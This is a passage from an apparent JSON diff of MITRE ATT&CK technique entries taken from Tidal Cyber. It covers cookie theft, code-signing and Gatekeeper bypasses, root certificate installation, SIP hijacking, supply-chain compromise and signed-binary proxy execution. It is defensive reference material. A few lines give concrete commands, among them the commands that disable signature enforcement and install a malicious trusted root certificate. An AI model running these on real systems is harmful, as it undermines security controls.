Mauraena](https://app.tidalcyber.com/references/578ecf62-b546-4f52-9d50-92557edf2dd4)]\n\nAfter an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://app.tidalcyber.com/technique/d36a5323-e249-44e8-9c8b-5cc9c023a5e1) technique to login to the corresponding web application.", + "meta": { + "platforms": [ + "Google Workspace", + "Linux", + "macOS", + "Office 365", + "SaaS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "17f9e46d-4e3d-4491-a0d9-0cc042531d6e", + "value": "Steal Web Session Cookie" + }, + { + "description": "Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. [[Wikipedia Code Signing](https://app.tidalcyber.com/references/363e860d-e14c-4fcd-985f-f76353018908)] The certificates used during an operation may be created, acquired, or stolen by the adversary. [[Securelist Digital Certificates](https://app.tidalcyber.com/references/3568163b-24b8-42fd-b111-b9d83c34cc4f)] [[Symantec Digital Certificates](https://app.tidalcyber.com/references/4b4f0171-827d-45c3-8c89-66ea801e77e8)] Unlike [Invalid Code Signature](https://app.tidalcyber.com/technique/aa5a31d0-1b78-481d-a317-5089c1e111bf), this activity will result in a valid signature.\n\nCode signing to verify software on first run can be used on modern Windows and macOS systems. It is not used on Linux due to the decentralized nature of the platform. [[Wikipedia Code Signing](https://app.tidalcyber.com/references/363e860d-e14c-4fcd-985f-f76353018908)][[EclecticLightChecksonEXECodeSigning](https://app.tidalcyber.com/references/2885db46-4f8c-4c35-901c-7641c7701293)]\n\nCode signing certificates may be used to bypass security policies that require signed code to execute on a system. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1553.002" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "9449c0d5-7445-45e0-9861-7aafd6531733", + "value": "Code Signing" + }, + { + "description": "Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system. \n\nSome of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS.[[Microsoft DSE June 2017](https://app.tidalcyber.com/references/451bdfe3-0b30-425c-97a0-44727b70c1da)][[Apple Disable SIP](https://app.tidalcyber.com/references/d7545e0c-f0b7-4be4-800b-06a02240385e)] Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.[[Microsoft Unsigned Driver Apr 2017](https://app.tidalcyber.com/references/5964ff2e-0860-4e00-8103-89ba6466314c)][[Apple Disable SIP](https://app.tidalcyber.com/references/d7545e0c-f0b7-4be4-800b-06a02240385e)]\n\nAdversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, [Modify Registry](https://app.tidalcyber.com/technique/0dfeab84-3c42-4b56-9021-70fe5be4092b), rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory.[[Microsoft TESTSIGNING Feb 2021](https://app.tidalcyber.com/references/c04153f9-d4c7-4349-9bef-3f883eec0028)][[Apple Disable SIP](https://app.tidalcyber.com/references/d7545e0c-f0b7-4be4-800b-06a02240385e)][[FireEye HIKIT Rootkit Part 2](https://app.tidalcyber.com/references/48448972-a5ed-4371-b930-b51dcb174b82)][[GitHub Turla Driver Loader](https://app.tidalcyber.com/references/ed3534be-06ce-487b-911d-abe2fba70210)] Examples of commands that can modify the code signing policy of a system include bcdedit.exe -set TESTSIGNING ON on Windows and csrutil disable on macOS.[[Microsoft TESTSIGNING Feb 2021](https://app.tidalcyber.com/references/c04153f9-d4c7-4349-9bef-3f883eec0028)][[Apple Disable SIP](https://app.tidalcyber.com/references/d7545e0c-f0b7-4be4-800b-06a02240385e)] Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the corner of the screen stating the system is in Test Mode). Adversaries may attempt to remove such artifacts.[[F-Secure BlackEnergy 2014](https://app.tidalcyber.com/references/5f228fb5-d959-4c4a-bb8c-f9dc01d5af07)]\n\nTo gain access to kernel memory to modify variables related to signature checks, such as modifying g_CiOptions to disable Driver Signature Enforcement, adversaries may conduct [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c) using a signed, but vulnerable driver.[[Unit42 AcidBox June 2020](https://app.tidalcyber.com/references/f3f2eca0-fda3-451e-bf13-aacb14668e48)][[GitHub Turla Driver Loader](https://app.tidalcyber.com/references/ed3534be-06ce-487b-911d-abe2fba70210)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1553.006" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "c26e1b28-89c9-4083-9f94-022c891bf60c", + "value": "Code Signing Policy Modification" + }, + { + "description": "Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.[[TheEclecticLightCompany Quarantine and the flag](https://app.tidalcyber.com/references/7cce88cc-fbfb-43e1-a330-ac55bce9e394)][[TheEclecticLightCompany apple notarization ](https://app.tidalcyber.com/references/80c840ab-782a-4f15-bc7b-2d2ab4e51702)]\n\nBased on an opt-in system, when files are downloaded an extended attribute (xattr) called `com.apple.quarantine` (also known as a quarantine flag) can be set on the file by the application performing the download. Launch Services opens the application in a suspended state. For first run applications with the quarantine flag set, Gatekeeper executes the following functions:\n\n1. Checks extended attribute – Gatekeeper checks for the quarantine flag, then provides an alert prompt to the user to allow or deny execution.[[OceanLotus for OS X](https://app.tidalcyber.com/references/6e9acc29-06af-4915-8e01-7dcccb204530)][[20 macOS Common Tools and Techniques](https://app.tidalcyber.com/references/3ee99ff4-daf4-4776-9d94-f7cf193c2b0c)]\n\n2. Checks System Policies - Gatekeeper checks the system security policy, allowing execution of apps downloaded from either just the App Store or the App Store and identified developers.\n\n3. Code Signing – Gatekeeper checks for a valid code signature from an Apple Developer ID.\n\n4. Notarization - Using the `api.apple-cloudkit.com` API, Gatekeeper reaches out to Apple servers to verify or pull down the notarization ticket and ensure the ticket is not revoked. Users can override notarization, which will result in a prompt of executing an “unauthorized app” and the security policy will be modified.\n\nAdversaries can subvert one or multiple security controls within Gatekeeper checks through logic errors (e.g. [Exploitation for Defense Evasion](https://app.tidalcyber.com/technique/15b65bf2-dbe5-47bc-be09-ed97684bf391)), unchecked file types, and external libraries. For example, prior to macOS 13 Ventura, code signing and notarization checks were only conducted on first launch, allowing adversaries to write malicious executables to previously opened applications in order to bypass Gatekeeper security checks.[[theevilbit gatekeeper bypass 2021](https://app.tidalcyber.com/references/d00f373d-2133-47c3-9b0a-104ecc9a6869)][[Application Bundle Manipulation Brandon Dalton](https://app.tidalcyber.com/references/2a8fd573-6ab0-403b-b813-88d9d3edab36)]\n\nApplications and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command may not set the quarantine flag. Additionally, it is possible to avoid setting the quarantine flag using [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1553.001" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "e558aca4-3db1-42a0-bec2-bb9823852b49", + "value": "Gatekeeper Bypass" + }, + { + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.[[Wikipedia Root Certificate](https://app.tidalcyber.com/references/68b9ccbb-906e-4f06-b5bd-3969723c3616)] Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.\n\nInstallation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.[[Operation Emmental](https://app.tidalcyber.com/references/36443369-4fa9-4802-8b21-68cc382b949f)]\n\nAtypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9) capability for intercepting information transmitted over secure TLS/SSL communications.[[Kaspersky Superfish](https://app.tidalcyber.com/references/3d554c05-992c-41f3-99f4-6b0baac56b3a)]\n\nRoot certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence.[[SpectorOps Code Signing Dec 2017](https://app.tidalcyber.com/references/3efc5ae9-c63a-4a07-bbbd-d7324acdbaf5)]\n\nIn macOS, the Ay MaMi malware uses /usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert to install a malicious certificate as a trusted root certificate into the system keychain.[[objective-see ay mami 2018](https://app.tidalcyber.com/references/1b1d656c-4fe6-47d1-9ce5-a70c33003507)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1553.004" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "3a956db0-a3f0-442a-a981-db2ee20d60b2", + "value": "Install Root Certificate" + }, + { + "description": "Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.[[Microsoft Zone.Identifier 2020](https://app.tidalcyber.com/references/2efbb7be-3ca1-444a-8584-7ceb08101e74)] Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file is not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.[[Beek Use of VHD Dec 2020](https://app.tidalcyber.com/references/7a1131ab-e4b1-4569-8e28-3650312cc804)][[Outflank MotW 2020](https://app.tidalcyber.com/references/54d9c59f-800a-426f-90c8-0d1cb2bea1ea)][[Intezer Russian APT Dec 2020](https://app.tidalcyber.com/references/88d8a3b7-d994-4fd2-9aa1-83b79bccda7e)]\n\nAdversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.[[Beek Use of VHD Dec 2020](https://app.tidalcyber.com/references/7a1131ab-e4b1-4569-8e28-3650312cc804)][[Outflank MotW 2020](https://app.tidalcyber.com/references/54d9c59f-800a-426f-90c8-0d1cb2bea1ea)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1553.005" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "7ee64e42-6d3b-47f8-a2a9-55263537bd51", + "value": "Mark-of-the-Web Bypass" + }, + { + "description": "Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode [[Microsoft Authenticode](https://app.tidalcyber.com/references/33efd1a3-ffe9-42b3-ae12-970ed11454bf)] digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, [[Microsoft WinVerifyTrust](https://app.tidalcyber.com/references/cc14faff-c164-4135-ae36-ba68e1a50024)] which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. [[SpectorOps Subverting Trust Sept 2017](https://app.tidalcyber.com/references/0b6e7651-0e17-4101-ab2b-22cb09fe1691)]\n\nBecause of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) [[EduardosBlog SIPs July 2008](https://app.tidalcyber.com/references/ac37f167-3ae9-437b-9215-c30c1ab4e249)] to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all [[Microsoft Catalog Files and Signatures April 2017](https://app.tidalcyber.com/references/5b6ae460-a1cf-4afe-a0c8-d6ea24741ebe)]) and are identified by globally unique identifiers (GUIDs). [[SpectorOps Subverting Trust Sept 2017](https://app.tidalcyber.com/references/0b6e7651-0e17-4101-ab2b-22cb09fe1691)]\n\nSimilar to [Code Signing](https://app.tidalcyber.com/technique/9449c0d5-7445-45e0-9861-7aafd6531733), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: [[SpectorOps Subverting Trust Sept 2017](https://app.tidalcyber.com/references/0b6e7651-0e17-4101-ab2b-22cb09fe1691)]\n\n* Modifying the Dll and FuncName Registry values in HKLM\\SOFTWARE[\\WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP [[GitHub SIP POC Sept 2017](https://app.tidalcyber.com/references/1a9bc729-532b-47ab-89ba-90b0ff41f8aa)] (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).\n* Modifying the Dll and FuncName Registry values in HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{SIP_GUID} that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP [[GitHub SIP POC Sept 2017](https://app.tidalcyber.com/references/1a9bc729-532b-47ab-89ba-90b0ff41f8aa)] (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.\n* Modifying the DLL and Function Registry values in HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\Providers\\Trust\\FinalPolicy\\{trust provider GUID} that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).\n* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://app.tidalcyber.com/technique/69cd62f8-b729-4a05-8351-5bb961f7c6d6).\n\nHijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. [[SpectorOps Subverting Trust Sept 2017](https://app.tidalcyber.com/references/0b6e7651-0e17-4101-ab2b-22cb09fe1691)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1553.003" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "62e5e1c5-4fee-4f05-9dd4-a6dc306a46b1", + "value": "SIP and Trust Provider Hijacking" + }, + { + "description": "Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features would include a program being allowed to run because it is signed by a valid code signing certificate, a program prompting the user with a warning because it has an attribute set from being downloaded from the Internet, or getting an indication that you are about to connect to an untrusted site.\n\nAdversaries may attempt to subvert these trust mechanisms. The method adversaries use will depend on the specific mechanism they seek to subvert. Adversaries may conduct [File and Directory Permissions Modification](https://app.tidalcyber.com/technique/cb2e4822-2529-4216-b5b8-75158c5f85ff) or [Modify Registry](https://app.tidalcyber.com/technique/0dfeab84-3c42-4b56-9021-70fe5be4092b) in support of subverting these controls.[[SpectorOps Subverting Trust Sept 2017](https://app.tidalcyber.com/references/0b6e7651-0e17-4101-ab2b-22cb09fe1691)] Adversaries may also create or steal code signing certificates to acquire trust on target systems.[[Securelist Digital Certificates](https://app.tidalcyber.com/references/3568163b-24b8-42fd-b111-b9d83c34cc4f)][[Symantec Digital Certificates](https://app.tidalcyber.com/references/4b4f0171-827d-45c3-8c89-66ea801e77e8)] ", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + }, + { + "dest-uuid": "9449c0d5-7445-45e0-9861-7aafd6531733", + "type": "similar" + }, + { + "dest-uuid": "c26e1b28-89c9-4083-9f94-022c891bf60c", + "type": "similar" + }, + { + "dest-uuid": "e558aca4-3db1-42a0-bec2-bb9823852b49", + "type": "similar" + }, + { + "dest-uuid": "3a956db0-a3f0-442a-a981-db2ee20d60b2", + "type": "similar" + }, + { + "dest-uuid": "7ee64e42-6d3b-47f8-a2a9-55263537bd51", + "type": "similar" + }, + { + "dest-uuid": "62e5e1c5-4fee-4f05-9dd4-a6dc306a46b1", + "type": "similar" + } + ], + "uuid": "73a8b954-93fe-466c-b73d-bd35bb08c3e7", + "value": "Subvert Trust Controls" + }, + { + "description": "Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system. Hardware backdoors may be inserted into various devices, such as servers, workstations, network infrastructure, or peripherals.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1195.003" + }, + "related": [ + { + "dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c", + "type": "uses" + } + ], + "uuid": "53fea37d-be26-4bed-a8a1-1d67f7cbffcf", + "value": "Compromise Hardware Supply Chain" + }, + { + "description": "Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency.[[Trendmicro NPM Compromise](https://app.tidalcyber.com/references/69eac1b0-1c50-4534-99e0-2d0fd738ab8f)] \n\nTargeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1195.001" + }, + "related": [ + { + "dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c", + "type": "uses" + } + ], + "uuid": "590b55cd-7c6a-4207-b89a-3d7494623f00", + "value": "Compromise Software Dependencies and Development Tools" + }, + { + "description": "Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.\n\nTargeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.[[Avast CCleaner3 2018](https://app.tidalcyber.com/references/1641553f-96e7-4829-8c77-d96388dac5c7)][[Command Five SK 2011](https://app.tidalcyber.com/references/ccca927e-fa03-4eba-b631-9989804a1f3c)] ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1195.002" + }, + "related": [ + { + "dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c", + "type": "uses" + } + ], + "uuid": "9953faea-d25d-4e6e-a132-8993535c5c14", + "value": "Compromise Software Supply Chain" + }, + { + "description": "Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply chain compromise can take place at any stage of the supply chain including:\n\n* Manipulation of development tools\n* Manipulation of a development environment\n* Manipulation of source code repositories (public or private)\n* Manipulation of source code in open-source dependencies\n* Manipulation of software update/distribution mechanisms\n* Compromised/infected system images (multiple cases of removable media infected at the factory)[[IBM Storwize](https://app.tidalcyber.com/references/321cf27a-327d-4824-84d0-56634d3b86f5)][[Schneider Electric USB Malware](https://app.tidalcyber.com/references/e4d8ce63-8626-4c8f-a437-b6a120ff61c7)] \n* Replacement of legitimate software with modified versions\n* Sales of modified/counterfeit products to legitimate distributors\n* Shipment interdiction\n\nWhile supply chain compromise can impact any component of hardware or software, adversaries looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels.[[Avast CCleaner3 2018](https://app.tidalcyber.com/references/1641553f-96e7-4829-8c77-d96388dac5c7)][[Microsoft Dofoil 2018](https://app.tidalcyber.com/references/85069317-2c25-448b-9ff4-504e429dc1bf)][[Command Five SK 2011](https://app.tidalcyber.com/references/ccca927e-fa03-4eba-b631-9989804a1f3c)] Targeting may be specific to a desired victim set or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.[[Symantec Elderwood Sept 2012](https://app.tidalcyber.com/references/5e908748-d260-42f1-a599-ac38b4e22559)][[Avast CCleaner3 2018](https://app.tidalcyber.com/references/1641553f-96e7-4829-8c77-d96388dac5c7)][[Command Five SK 2011](https://app.tidalcyber.com/references/ccca927e-fa03-4eba-b631-9989804a1f3c)] Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency.[[Trendmicro NPM Compromise](https://app.tidalcyber.com/references/69eac1b0-1c50-4534-99e0-2d0fd738ab8f)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c", + "type": "uses" + }, + { + "dest-uuid": "53fea37d-be26-4bed-a8a1-1d67f7cbffcf", + "type": "similar" + }, + { + "dest-uuid": "590b55cd-7c6a-4207-b89a-3d7494623f00", + "type": "similar" + }, + { + "dest-uuid": "9953faea-d25d-4e6e-a132-8993535c5c14", + "type": "similar" + } + ], + "uuid": "b72c8a96-5e03-40c2-ac0c-f77b73fe493f", + "value": "Supply Chain Compromise" + }, + { + "description": "Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. [[Microsoft Connection Manager Oct 2009](https://app.tidalcyber.com/references/0b0880a8-82cc-4e23-afd9-95d099c753a4)] CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.\n\nAdversaries may supply CMSTP.exe with INF files infected with malicious commands. [[Twitter CMSTP Usage Jan 2018](https://app.tidalcyber.com/references/836621f3-83e1-4c55-8e3b-740fc9ba1e46)] Similar to [Regsvr32](https://app.tidalcyber.com/technique/b1da2b02-9ade-45e0-a795-ec1b19e5316a) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs [[MSitPros CMSTP Aug 2017](https://app.tidalcyber.com/references/8dbbf13b-e73c-43c2-a053-7b07fdf25c85)] and/or COM scriptlets (SCT) from remote servers. [[Twitter CMSTP Jan 2018](https://app.tidalcyber.com/references/3847149c-1463-4d94-be19-0a8cf1db0b58)] [[GitHub Ultimate AppLocker Bypass List](https://app.tidalcyber.com/references/a2fa7fb8-ddba-44cf-878f-448fb2aa6149)] [[Endurant CMSTP July 2018](https://app.tidalcyber.com/references/d67901a4-8774-42d3-98de-c20158f88eb6)] This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate binary that may be signed by Microsoft.\n\nCMSTP.exe can also be abused to [Bypass User Account Control](https://app.tidalcyber.com/technique/5e1499a1-f1ad-4929-84e1-5d33c371c02d) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. [[MSitPros CMSTP Aug 2017](https://app.tidalcyber.com/references/8dbbf13b-e73c-43c2-a053-7b07fdf25c85)] [[GitHub Ultimate AppLocker Bypass List](https://app.tidalcyber.com/references/a2fa7fb8-ddba-44cf-878f-448fb2aa6149)] [[Endurant CMSTP July 2018](https://app.tidalcyber.com/references/d67901a4-8774-42d3-98de-c20158f88eb6)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1218.003" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "581c5073-4236-4c45-b8fc-37ae2dfbb65f", + "value": "CMSTP" + }, + { + "description": "Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. [[Microsoft HTML Help May 2018](https://app.tidalcyber.com/references/f9daf15d-61ea-4cfa-a4e8-9d33d1acd28f)] CHM content is displayed using underlying components of the Internet Explorer browser [[Microsoft HTML Help ActiveX](https://app.tidalcyber.com/references/ae5728bd-571a-451f-9ba3-3198067135b4)] loaded by the HTML Help executable program (hh.exe). [[Microsoft HTML Help Executable Program](https://app.tidalcyber.com/references/1af226cc-bb93-43c8-972e-367482c5d487)]\n\nA custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872). CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. [[MsitPros CHM Aug 2017](https://app.tidalcyber.com/references/d4e4cc8a-3246-463f-ba06-d68459d907d4)] [[Microsoft CVE-2017-8625 Aug 2017](https://app.tidalcyber.com/references/402cb526-ef57-4d27-b96b-f98008abe716)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1218.001" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "b5c7edc6-0cc7-4c57-b39f-3b0474433889", + "value": "Compiled HTML File" + }, + { + "description": "Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.\n\nControl Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function.[[Microsoft Implementing CPL](https://app.tidalcyber.com/references/63c5c654-e885-4427-a644-068f4057f35f)][[TrendMicro CPL Malware Jan 2014](https://app.tidalcyber.com/references/9549f9b6-b771-4500-bd82-426c7abdfd8f)] For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.[[Microsoft Implementing CPL](https://app.tidalcyber.com/references/63c5c654-e885-4427-a644-068f4057f35f)] Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.[[Microsoft Implementing CPL](https://app.tidalcyber.com/references/63c5c654-e885-4427-a644-068f4057f35f)] [[TrendMicro CPL Malware Jan 2014](https://app.tidalcyber.com/references/9549f9b6-b771-4500-bd82-426c7abdfd8f)][[TrendMicro CPL Malware Dec 2013](https://app.tidalcyber.com/references/fd38f1fd-37e9-4173-b319-3f92c2743055)]\n\nMalicious Control Panel items can be delivered via [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) campaigns[[TrendMicro CPL Malware Jan 2014](https://app.tidalcyber.com/references/9549f9b6-b771-4500-bd82-426c7abdfd8f)][[TrendMicro CPL Malware Dec 2013](https://app.tidalcyber.com/references/fd38f1fd-37e9-4173-b319-3f92c2743055)] or executed as part of multi-stage malware.[[Palo Alto Reaver Nov 2017](https://app.tidalcyber.com/references/69fbe527-2ec4-457b-81b1-2eda65eb8442)] Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.\n\nAdversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel\\Cpls. Even when these registered DLLs do not comply with the CPL file specification and do not export CPlApplet functions, they are loaded and executed through its DllEntryPoint when Control Panel is executed. CPL files not exporting CPlApplet are not directly executable.[[ESET InvisiMole June 2020](https://app.tidalcyber.com/references/d10cfda8-8fd8-4ada-8c61-dba6065b0bac)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1218.002" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "b5cc9ab3-6501-4c50-904e-1a25a4088125", + "value": "Control Panel" + }, + { + "description": "Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. [[MSDN 